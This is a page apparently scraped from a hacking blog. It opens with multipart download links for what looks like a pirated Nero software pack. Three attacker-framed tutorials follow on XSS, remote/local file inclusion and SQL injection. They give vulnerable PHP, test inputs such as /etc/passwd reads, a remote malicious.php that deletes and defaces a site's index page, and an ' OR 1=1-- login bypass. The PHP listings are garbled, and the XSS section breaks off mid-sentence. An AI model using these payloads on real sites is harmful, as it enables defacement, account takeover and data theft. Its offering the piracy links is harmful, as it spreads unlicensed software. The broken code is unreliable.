DOWNLOAD
HotFile:


http://hotfile.com/dl/57762725/e4259e8/Nero9AIOpack2010.part01.rar.html
http://hotfile.com/dl/57762792/d4f8a01/Nero9AIOpack2010.part02.rar.html
http://hotfile.com/dl/57762857/69a92bb/Nero9AIOpack2010.part03.rar.html
http://hotfile.com/dl/57762930/6aa319c/Nero9AIOpack2010.part04.rar.html
http://hotfile.com/dl/57762999/599d1e8/Nero9AIOpack2010.part05.rar.html
http://hotfile.com/dl/57763044/59e6407/Nero9AIOpack2010.part06.rar.html
http://hotfile.com/dl/57763128/91dd014/Nero9AIOpack2010.part07.rar.html
http://hotfile.com/dl/57763209/e444d65/Nero9AIOpack2010.part08.rar.html


Fileserve:


http://www.fileserve.com/file/GuSmAtH
http://www.fileserve.com/file/BV7tgSH
http://www.fileserve.com/file/MaZWGTZ
http://www.fileserve.com/file/chk76tj
http://www.fileserve.com/file/EzQgSYt
http://www.fileserve.com/file/tseuqhT
http://www.fileserve.com/file/tC8QYwt
http://www.fileserve.com/file/XVgYFWu


Sharingmatrix:


http://sharingmatrix.com/file/14815645/Nero9AIOpack2010.part01.rar
http://sharingmatrix.com/file/14815659/Nero9AIOpack2010.part02.rar
http://sharingmatrix.com/file/14815673/Nero9AIOpack2010.part03.rar
http://sharingmatrix.com/file/14815681/Nero9AIOpack2010.part04.rar
http://sharingmatrix.com/file/14815705/Nero9AIOpack2010.part05.rar
http://sharingmatrix.com/file/14815731/Nero9AIOpack2010.part06.rar
http://sharingmatrix.com/file/14815739/Nero9AIOpack2010.part07.rar
http://sharingmatrix.com/file/14815747/Nero9AIOpack2010.part08.rar
###########################################################3
-------------------------------------------------------------------------------
.........................................................................................................................


Read More Add your Comment 0 comments


What is XSS (Cross-Site Scripting)



....................................................................................................................
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)
Example Vulnerable Code - search.php (PHP)

PHP Code:

 
$s $_GET['search'];// a real search engine would do some database stuff  hereecho("You searched for $s. There were no results found");?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to

goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=
###########################################################
------------------------------------------------------------------------------------
............................................................................................................................


Read More Add your Comment 0 comments


What is RFI/LFI (Remote/Local File Include)



...........................................................................................................

Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)



PHP Code:
$page $_GET['p'];
if (isset(
$page)) {
    include(
$page);
} else {
    include(
"home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:
unlink("index.php");system("echo Hacked > index.php");?>
and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
##########################################
----------------------------------------------------------------------------
.................................................................................................


Read More Add your Comment 0 comments


What is SQL Injection?



SQL Injection

                                                                  What is SQL?

The word SQL stands for structure query language.A language that can communicate with Database.
SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
 
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
 PHP CODE


$user $_POST['u'];$pass $_POST['p'];

if (!isset(
$user) || !isset($pass)) {
    echo(
"");
} else {
    
$sql "SELECT `IP` FROM `users` WHERE `username`='$user' 

            AND `password`='$pass'";
    
$ret mysql_query($sql);
    
$ret mysql_fetch_array($ret);
    if (
$ret[0] != "") {
        echo(
"Welcome, $user.");
    } else {
        echo(
"Incorrect login details.");
    }
}
?>

Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
 
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
 
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.
 ######################################################
-------------------------------------------------------------------------------------------
....................................................................................................................


Read More Add your Comment 0 comments


 

© 2011 Learn Cyber Security All Rights Reserved Learn Hacking Online hackguide4u.com